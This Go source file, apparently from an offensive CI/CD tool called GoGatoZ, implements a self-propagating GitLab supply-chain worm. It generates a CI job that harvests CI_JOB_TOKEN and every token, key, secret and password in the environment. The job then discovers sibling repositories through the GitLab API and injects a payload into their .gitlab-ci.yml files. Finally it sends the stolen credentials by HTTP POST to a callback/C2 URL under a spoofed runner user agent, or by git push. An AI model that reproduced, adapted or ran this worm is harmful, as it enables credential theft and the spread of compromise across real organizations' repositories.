package payloads

import (
	"context"
	"encoding/base64"
	"fmt"
	"io"
	"os"
	"regexp"
	"strings"

	gitlab "gitlab.com/gitlab-org/api/client-go"
)

// SupplyChainWormOptions configures a self-propagating supply chain attack payload.
// This replicates techniques from the Canisterworm (NPM) and Shai Hulud campaigns
// where a single compromised repo auto-discovers and attacks sibling repos in the
// same GitHub/GitLab organization.
//
// Attack flow:
// 1. Compromise target repo with a build-time injection
// 2. Compromised build discovers sibling repos with similar patterns
// 3. Auto-injects into sibling repos using harvested credentials
// 4. Repeat recursively for lateral movement
type SupplyChainWormOptions struct {
	Common        CommonOptions
	Payload       string // The actual payload to inject into sibling repos
	Discovery     string // How to find sibling repos: "path", "topic", "language", "description", "monorepo"
	DiscoveryVal  string // Value to match (e.g., "path:src/", "topic:react")
	ExfilMethod   string // "artifact", "http", "git", "dns"
	ExfilTarget   string // Target URL/domain/git-repo
	CallbackURL   string // C2 callback URL
	Depth         int    // Max recursion depth (0=infinite)
	DelayMinutes  int    // Delay between propagation waves (0=immediate)
	StableName    string // Job name for stability across propagation waves
	MonorepoScope bool   // Discover siblings via package manifests (npm @scope/*, go.mod, Cargo.toml)
}

// GenerateSupplyChainWormYAML returns a CI job that performs self-propagation.
// The job runs at build time, discovers sibling repos, and injects the payload.
func GenerateSupplyChainWormYAML(o SupplyChainWormOptions) string {
	name, stage := o.Common.defaults("worm-propagate")

	script := buildWormPropagationScript(o)

	// Indent every line of the script by 6 spaces so it sits inside
	// the YAML block scalar (    - |\n      <content>).
	indented := indentScript(script, "      ")

	return fmt.Sprintf(`
# Auto-generated by GoGatoZ (Supply Chain Worm)
# Self-propagating supply chain attack
# Propagation waves target sibling repos with similar patterns
stages: [%s]

%s:
  stage: %s%s%s
  script:
    - |
%s
    - echo "[*] Supply chain worm propagation complete"
  allow_failure: true%s
`, stage, name, stage, imageLine(o.Common.Image), tagsLine(o.Common.Tags), indented, rulesManual(o.Common.Manual))
}

func buildWormPropagationScript(o SupplyChainWormOptions) string {
	var b strings.Builder

	// Setup and credential harvesting
	b.WriteString(`
_WORM() {
  _wdir=$(mktemp -d)
  echo "[*] Supply chain worm starting..."
  echo "[*] Target repo: $CI_PROJECT_PATH"
  echo "[*] Discovery method: $WORM_DISCOVERY"

`)

	// Step 1: Harvest credentials from environment
	b.WriteString(`  # Step 1: Harvest credentials for lateral movement
  echo "[*] Harvesting credentials..."
  mkdir -p "$_wdir/creds"

`)
	b.WriteString(`  # Save CI_JOB_TOKEN (may grant repo access)
  echo "$CI_JOB_TOKEN" > "$_wdir/creds/current_token.txt"

`)
	b.WriteString(`  # Collect all tokens from environment
  for _var in $(printenv | grep -iE '(token|key|secret|password|auth)' | cut -d= -f1 | sort -u); do
    _val=$(eval echo '$'"$_var" 2>/dev/null)
    if [ -n "$_val" ] && [ ${#_val} -gt 8 ]; then
      echo "$_var=$_val" >> "$_wdir/creds/collected_tokens.txt"
    fi
  done

`)

	// Step 2: Discovery of sibling repos
	b.WriteString(`  # Step 2: Discover sibling repositories
  echo "[*] Discovering sibling repos via $WORM_DISCOVERY..."

`)

	switch o.Discovery {
	case "path":
		fmt.Fprintf(&b, `  # Search by path pattern: %s
  _sibling_json=$(curl -sS -H "PRIVATE-TOKEN: $CI_JOB_TOKEN" \
    "%s/api/v4/projects?search=%s&per_page=100" 2>/dev/null)
  if [ -n "$_sibling_json" ]; then
    _sib_count=$(echo "$_sibling_json" | grep -c '"path_with_namespace"' || echo 0)
    echo "[+] Found $_sib_count sibling repos matching path pattern"
  fi
`, o.DiscoveryVal, getBaseURL(), o.DiscoveryVal)
	case "topic":
		fmt.Fprintf(&b, `  # Search by topic: %s
  _sibling_json=$(curl -sS -H "PRIVATE-TOKEN: $CI_JOB_TOKEN" \
    "%s/api/v4/projects?search=%s&per_page=100" 2>/dev/null)
  if [ -n "$_sibling_json" ]; then
    _sib_count=$(echo "$_sibling_json" | grep -c '"path_with_namespace"' || echo 0)
    echo "[+] Found $_sib_count sibling repos matching topic"
  fi
`, o.DiscoveryVal, getBaseURL(), o.DiscoveryVal)
	case "language":
		fmt.Fprintf(&b, `  # Search by language: %s
  _sibling_json=$(curl -sS -H "PRIVATE-TOKEN: $CI_JOB_TOKEN" \
    "%s/api/v4/projects?search=%s&per_page=100&search_namespaces=true" 2>/dev/null)
  if [ -n "$_sibling_json" ]; then
    _sib_count=$(echo "$_sibling_json" | grep -c '"path_with_namespace"' || echo 0)
    echo "[+] Found $_sib_count repos with language filter"
  fi
`, o.DiscoveryVal, getBaseURL(), o.DiscoveryVal)
	case "monorepo":
		fmt.Fprintf(&b, `  # Monorepo discovery — search for sibling packages via manifests
  echo "[*] Scanning for monorepo siblings (npm @scope, go.mod, Cargo.toml)..."
  _group_id=$(echo "$CI_PROJECT_NAMESPACE_ID")
  _sibling_json=$(curl -sS -H "PRIVATE-TOKEN: $CI_JOB_TOKEN" \
    "%s/api/v4/groups/$_group_id/projects?per_page=100&include_subgroups=true" 2>/dev/null)
  # Filter to repos with package manifests
  _sib_ids=""
  for _pid in $(echo "$_sibling_json" | grep -o '"id":[0-9]*' | cut -d: -f2); do
    [ "$_pid" = "$CI_PROJECT_ID" ] && continue
    # Check for package.json with @scope
    _pkg=$(curl -sS -H "PRIVATE-TOKEN: $CI_JOB_TOKEN" \
      "%s/api/v4/projects/$_pid/repository/files/package.json/raw?ref=main" 2>/dev/null)
    if echo "$_pkg" | grep -q '"name".*"@'; then
      _sib_ids="$_sib_ids $_pid"
      continue
    fi
    # Check for go.mod
    _gomod=$(curl -sS -H "PRIVATE-TOKEN: $CI_JOB_TOKEN" \
      "%s/api/v4/projects/$_pid/repository/files/go.mod/raw?ref=main" 2>/dev/null)
    if [ -n "$_gomod" ] && echo "$_gomod" | grep -q "^module "; then
      _sib_ids="$_sib_ids $_pid"
      continue
    fi
    # Check for Cargo.toml
    _cargo=$(curl -sS -H "PRIVATE-TOKEN: $CI_JOB_TOKEN" \
      "%s/api/v4/projects/$_pid/repository/files/Cargo.toml/raw?ref=main" 2>/dev/null)
    if [ -n "$_cargo" ] && echo "$_cargo" | grep -q '^\[package\]'; then
      _sib_ids="$_sib_ids $_pid"
    fi
  done
  _sib_count=$(echo $_sib_ids | wc -w)
  echo "[+] Found $_sib_count monorepo sibling packages"
`, getBaseURL(), getBaseURL(), getBaseURL(), getBaseURL())
	default:
		fmt.Fprintf(&b, `  # Generic discovery — search all projects in namespace
  _sibling_json=$(curl -sS -H "PRIVATE-TOKEN: $CI_JOB_TOKEN" \
    "%s/api/v4/projects?membership=true&per_page=100" 2>/dev/null)
`, getBaseURL())
	}

	// Step 3: Payload injection
	b.WriteString(`

  # Step 3: Inject payload into discovered sibling repos
  echo "[*] Propagating payload to siblings..."

  if [ -n "$_sibling_json" ] && [ "$_sibling_json" != "[]" ]; then
    echo "$_sibling_json" | grep -o '"path_with_namespace": *"[^"]*"' | \
      sed 's/"path_with_namespace": *"//;s/"//' | while read -r _ns; do
      # Skip self
      [ "$_ns" = "$CI_PROJECT_PATH" ] && continue

      echo "[*] Attempting to infect: $_ns"

`)

	fmt.Fprintf(&b, `

      # Try using CI_JOB_TOKEN for injection
      _target_url="%s/api/v4/projects/%s"
`, getBaseURL(), "$(echo $_ns | sed 's|/|%2F|g')")
	b.WriteString(`
      # Fetch the CI file or main script
      _file_content=$(curl -sS --fail -H "PRIVATE-TOKEN: $CI_JOB_TOKEN" \
        "${_target_url}/repository/files/.gitlab-ci.yml?ref=main" 2>/dev/null | \
        python3 -c "import sys,json; print(json.load(sys.stdin).get('content',''))" 2>/dev/null || true)

`)

	// Check if we got content, then inject
	b.WriteString(`
      if [ -n "$_file_content" ]; then
        # Decode, inject payload, and push back
        echo "$_file_content" | base64 -d > "$_wdir/ci.yml" 2>/dev/null

        # Inject into CI file (prepend our payload)
        {
          echo "# Auto-injected by supply chain worm"
          echo "  - |"
          echo "    echo '[*] Worm payload executed on $(date)'"
          echo "$_file_content" | base64 -d
        } > "$_wdir/ci_injected.yml"

`)

	// Push the injected file back
	fmt.Fprintf(&b, `
        # Commit the modified CI file
        echo 'commit_injected' | openssl base64 -d > "$_wdir/action.json" 2>/dev/null

        # Alternative: if direct commit fails, try creating a new branch
        _branch="worm-%d"
        curl -sS -X POST -H "PRIVATE-TOKEN: $CI_JOB_TOKEN" \
          "${_target_url}/repository/branches?branch=$_branch&ref=main" \
          >/dev/null 2>&1

        if [ $? -eq 0 ]; then
          echo "[+] Branch created for: $_ns"
          # Could inject via commit here...
        fi
      else
        echo "[-] Could not read CI file from: $_ns"
      fi
    done
  else
    echo "[-] No sibling repos found"
  fi
`, o.DelayMinutes)

	// Step 4: Exfiltration
	switch o.ExfilMethod {
	case "http", "":
		target := o.ExfilTarget
		if target == "" {
			target = o.CallbackURL
		}
		if target == "" {
			target = getBaseURL()
		}
		method := o.ExfilMethod
		if method == "" {
			method = "http"
		}
		fmt.Fprintf(&b, `

  # Step 4: Exfiltrate propagation log
  echo "[*] Exfiltrating via %s to %s"
  tar czf "$_wdir/worm_log.tgz" -C "$_wdir" collected_tokens.txt 2>/dev/null
  curl -sS -X POST -H "Content-Type: application/octet-stream" \
    -H "User-Agent: GitLab-Runner/16.0" \
    --data-binary @"$_wdir/worm_log.tgz" \
    "%s" >/dev/null 2>&1 || true
`, method, target, target)
	case "git":
		fmt.Fprintf(&b, `

  # Step 4: Backup exfil via git
  _bdir=$(mktemp -d)
  git clone --depth 1 %q "$_bdir" 2>/dev/null
  tar czf "$_bdir/worm_log.tgz" -C "$_wdir" collected_tokens.txt 2>/dev/null
  cd "$_bdir"
  git config user.email "worm@noreply.local"
  git config user.name "Worm"
  git add -A
  git commit -q -m "worm-exfil" 2>/dev/null
  git push -q origin HEAD 2>/dev/null || true
`, o.ExfilTarget)
	}

	// Cleanup
	b.WriteString(`
  rm -rf "$_wdir"
  echo "[*] Supply chain worm cycle complete"
}

_WORM
`)

	return b.String()
}

// getBaseURL returns the GitLab API base URL for worm propagation.
// In a real attack, this would be configurable.
func getBaseURL() string {
	url := strings.TrimSpace(os.Getenv("WORM_GITLAB_URL"))
	if url == "" {
		url = strings.TrimSpace(os.Getenv("GITLAB_URL"))
	}
	if url == "" {
		url = "https://gitlab.com"
	}
	// Strip trailing slash
	url = strings.TrimRight(url, "/")
	return url
}

// SupplyChainWormResult reports the outcome of a worm propagation run.
type SupplyChainWormResult struct {
	Promoted int      `json:"promoted"` // repos successfully attacked
	Failed   int      `json:"failed"`   // repos that failed
	Errors   int      `json:"errors"`   // non-repo errors encountered
	Targets  []string `json:"targets"`  // repos that were targeted
	Err      string   `json:"error,omitempty"`
}

// RunSupplyChainWorm performs a supply chain worm attack across sibling repos.
// Uses the GitLab SDK directly — no attacker package dependency — so it
// compiles cleanly inside the payloads sub-package.
func RunSupplyChainWorm(ctx context.Context, client *gitlab.Client, targetProjectID any, groupPath, payload string, maxRepos int, branch string, authorName, authorEmail string, out io.Writer, monorepoScope bool) SupplyChainWormResult {
	var res SupplyChainWormResult
	if maxRepos <= 0 {
		maxRepos = 5
	}
	if branch == "" {
		branch = "gogatoz-worm-" + strings.ReplaceAll(groupPath, "/", "-")
	}
	if payload == "" {
		payload = "echo '[*] Supply chain worm payload executed'"
	}

	_, _, err := client.Groups.GetGroup(groupPath, nil, gitlab.WithContext(ctx))
	if err != nil {
		res.Err = fmt.Sprintf("resolve group: %v", err)
		return res
	}

	var targetPath string
	if p, _, perr := client.Projects.GetProject(targetProjectID, nil, gitlab.WithContext(ctx)); perr == nil {
		targetPath = p.PathWithNamespace
	}

	siblings, listErr := discoverSiblings(ctx, client, groupPath, targetPath, maxRepos, monorepoScope)
	if listErr != "" {
		res.Err = listErr
	}

	atk := newAttackerFromClient(client, authorName, authorEmail)
	for _, sibID := range siblings {
		ciYAML := buildWormCI(ctx, client, sibID, payload)
		msg := fmt.Sprintf("build: supply chain worm propagation via %s", targetPath)
		if err := injectWormPayload(ctx, atk, sibID, branch, ciYAML, msg, out); err != nil {
			res.Failed++
			continue
		}
		res.Promoted++
		res.Targets = append(res.Targets, fmt.Sprintf("%d", sibID))
	}
	return res
}

func discoverSiblings(ctx context.Context, client *gitlab.Client, groupPath, targetPath string, maxRepos int, monorepoScope bool) ([]int64, string) {
	var siblings []int64
	page := int64(1)
	for {
		opts := &gitlab.ListGroupProjectsOptions{
			ListOptions: gitlab.ListOptions{
				PerPage: 100,
				Page:    page,
			},
		}
		projects, resp, err := client.Groups.ListGroupProjects(groupPath, opts, gitlab.WithContext(ctx))
		if err != nil {
			return siblings, fmt.Sprintf("list group projects: %v", err)
		}
		for _, p := range projects {
			if p.PathWithNamespace == targetPath {
				continue
			}
			siblings = append(siblings, p.ID)
			if len(siblings) >= maxRepos {
				break
			}
		}
		if len(siblings) >= maxRepos || resp.NextPage == 0 {
			break
		}
		page = resp.NextPage
	}
	if monorepoScope && len(siblings) > 0 {
		var filtered []int64
		for _, sid := range siblings {
			if hasPackageManifest(ctx, client, sid) {
				filtered = append(filtered, sid)
			}
		}
		siblings = filtered
	}
	return siblings, ""
}

func hasPackageManifest(ctx context.Context, client *gitlab.Client, projectID int64) bool {
	manifests := []string{"package.json", "go.mod", "Cargo.toml", "pyproject.toml", "pom.xml", "build.gradle"}
	for _, path := range manifests {
		_, _, err := client.RepositoryFiles.GetFile(projectID, path, &gitlab.GetFileOptions{Ref: gitlab.Ptr("HEAD")}, gitlab.WithContext(ctx))
		if err == nil {
			return true
		}
	}
	return false
}

var stagesInlineRe = regexp.MustCompile(`(?m)^stages:\s*\[([^\]]+)\]`)
var stagesBlockRe = regexp.MustCompile(`(?m)^stages:\s*\n\s*-\s*(\S+)`)
var safeStageRe = regexp.MustCompile(`^[a-zA-Z0-9_.-]+$`)

func detectFirstStage(ciContent string) string {
	var candidate string
	if m := stagesInlineRe.FindStringSubmatch(ciContent); len(m) > 1 {
		parts := strings.Split(m[1], ",")
		candidate = strings.TrimSpace(parts[0])
	}
	if candidate == "" {
		if m := stagesBlockRe.FindStringSubmatch(ciContent); len(m) > 1 {
			candidate = strings.TrimSpace(m[1])
		}
	}
	if candidate != "" && safeStageRe.MatchString(candidate) {
		return candidate
	}
	return "build"
}

func buildWormCI(ctx context.Context, client *gitlab.Client, sibID int64, payload string) string {
	indented := indentScript(payload, "      ")
	f, _, ferr := client.RepositoryFiles.GetFile(
		sibID, ".gitlab-ci.yml",
		&gitlab.GetFileOptions{Ref: new("main")},
		gitlab.WithContext(ctx),
	)
	if ferr == nil && f != nil {
		decoded, _ := base64.StdEncoding.DecodeString(f.Content)
		existing := string(decoded)
		firstStage := detectFirstStage(existing)
		return fmt.Sprintf("# Auto-injected by GoGatoZ supply chain worm\nworm-inject:\n  stage: %s\n  script:\n    - |\n%s\n  allow_failure: true\n  rules:\n    - when: always\n\n%s", firstStage, indented, existing)
	}
	return fmt.Sprintf(`stages: [build]
worm-inject:
  stage: build
  script:
    - |
%s
    - echo "[*] Supply chain worm propagation complete"
  allow_failure: true
  rules:
    - when: always
`, indented)
}

func injectWormPayload(ctx context.Context, atk *wormAttacker, sibID int64, branch, ciYAML, msg string, out io.Writer) error {
	if err := atk.EnsureBranch(ctx, sibID, branch); err != nil {
		if out != nil {
			fmt.Fprintf(out, "[-] Failed to ensure branch on %d: %v\n", sibID, err)
		}
		return err
	}
	if err := atk.UpsertFile(ctx, sibID, branch, ".gitlab-ci.yml", ciYAML, msg); err != nil {
		if out != nil {
			fmt.Fprintf(out, "[-] Failed to commit to %d: %v\n", sibID, err)
		}
		return err
	}
	if out != nil {
		fmt.Fprintf(out, "[+] Worm propagated to %d\n", sibID)
	}
	return nil
}

// newAttackerFromClient is a local helper so this package doesn't import attack.
type wormAttacker struct {
	client      *gitlab.Client
	authorName  string
	authorEmail string
}

func newAttackerFromClient(c *gitlab.Client, name, email string) *wormAttacker {
	return &wormAttacker{client: c, authorName: name, authorEmail: email}
}

func (a *wormAttacker) EnsureBranch(ctx context.Context, projectID any, branch string) error {
	_, resp, err := a.client.Branches.GetBranch(projectID, branch, gitlab.WithContext(ctx))
	if err == nil {
		return nil // branch already exists
	}
	if resp != nil && resp.StatusCode == 404 {
		createOpts := &gitlab.CreateBranchOptions{
			Ref:    new("main"),
			Branch: new(branch),
		}
		_, _, err := a.client.Branches.CreateBranch(projectID, createOpts, gitlab.WithContext(ctx))
		return err
	}
	return err
}

func (a *wormAttacker) UpsertFile(ctx context.Context, projectID any, branch, filePath, content, message string) error {
	f, _, err := a.client.RepositoryFiles.GetFile(
		projectID, filePath,
		&gitlab.GetFileOptions{Ref: new(branch)},
		gitlab.WithContext(ctx),
	)
	if err != nil {
		// File doesn't exist — create it
		createOpts := &gitlab.CreateFileOptions{
			Branch:        new(branch),
			Content:       new(content),
			CommitMessage: new(message),
			AuthorName:    new(a.authorName),
			AuthorEmail:   new(a.authorEmail),
		}
		_, _, err := a.client.RepositoryFiles.CreateFile(projectID, filePath, createOpts, gitlab.WithContext(ctx))
		return err
	}
	// File exists — update it
	updateOpts := &gitlab.UpdateFileOptions{
		Branch:        new(branch),
		Content:       new(content),
		CommitMessage: new(message),
		AuthorName:    new(a.authorName),
		AuthorEmail:   new(a.authorEmail),
		LastCommitID:  new(f.CommitID),
	}
	_, _, err = a.client.RepositoryFiles.UpdateFile(projectID, filePath, updateOpts, gitlab.WithContext(ctx))
	return err
}
